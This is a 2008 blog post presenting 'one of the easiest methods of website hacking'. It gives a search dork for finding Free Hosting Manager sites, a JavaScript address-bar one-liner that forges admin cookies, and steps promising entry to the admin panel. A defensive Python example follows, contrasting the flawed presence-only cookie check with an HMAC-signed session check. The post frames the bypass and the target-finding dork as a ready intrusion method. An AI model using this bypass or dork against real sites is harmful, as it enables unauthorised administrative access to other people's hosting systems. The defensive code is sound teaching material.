Security
Software
Necessary

Monday, August 25, 2008

One of the easiest methods of WEBSITE HACKING

Free Hosting Manager = 1.2 & 2.0
Insecure Cookie Handling Vulnerability

DorKs : "Powered By Free Hosting Manager"

DESCRIPTION :
The admin panel only checks whether the cookie exists.

Vulnerability :
After opening the site, run the following JavaScript in the address bar:
javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/";

The complete line above may not be fully visible in this blog; copy and paste it into Notepad to see it in full.

After running the JavaScript, go to "www.site.com/admin" and refresh.

BANG!!! You will be in the admin panel.

AUTHOR : Scary-Boys

source : http://www.milw0rm.com/exploits/6213
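
The flaw in the description above (an admin check that trusts the mere presence of client-set cookies) shown next to a check the server can actually verify. This is an added example, not code from Free Hosting Manager or the original advisory; the function names, the `session` cookie name, the key and the lifetime are assumptions.

```python
import hashlib
import hmac
import secrets
import time

SERVER_KEY = secrets.token_bytes(32)  # assumption: secret that never leaves the server
SESSION_TTL = 1800                    # assumption: session lifetime in seconds


def is_admin_presence_only(cookies):
    """Flawed pattern: any client that sends these two cookie names passes."""
    return "adminuser" in cookies and "loggedin" in cookies


def _tag(payload):
    return hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()


def issue_session(username, now=None):
    """Call only after the password check succeeds; returns the cookie value."""
    if "|" in username:
        raise ValueError("username must not contain the field separator")
    expires = int(time.time() if now is None else now) + SESSION_TTL
    payload = f"{username}|{expires}"
    return f"{payload}|{_tag(payload)}"


def verify_session(cookies, now=None):
    """Return the username, or None if the cookie is missing, forged or expired."""
    parts = cookies.get("session", "").split("|")
    if len(parts) != 3:
        return None
    username, expires, tag = parts
    expected = _tag(f"{username}|{expires}")
    # Constant-time comparison; a client cannot compute the tag without SERVER_KEY.
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return None
    if int(expires) < (time.time() if now is None else now):
        return None
    return username


# Constructed sample input: the two cookies set by the address-bar line above.
forged = {"adminuser": "1", "loggedin": "1"}

if __name__ == "__main__":
    print("presence-only check:", is_admin_presence_only(forged))  # accepted
    print("signed-session check:", verify_session(forged))         # rejected
```

A server-side session store keyed by a random identifier is an equally valid fix; in either case the cookie should also be sent with the HttpOnly and Secure attributes.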
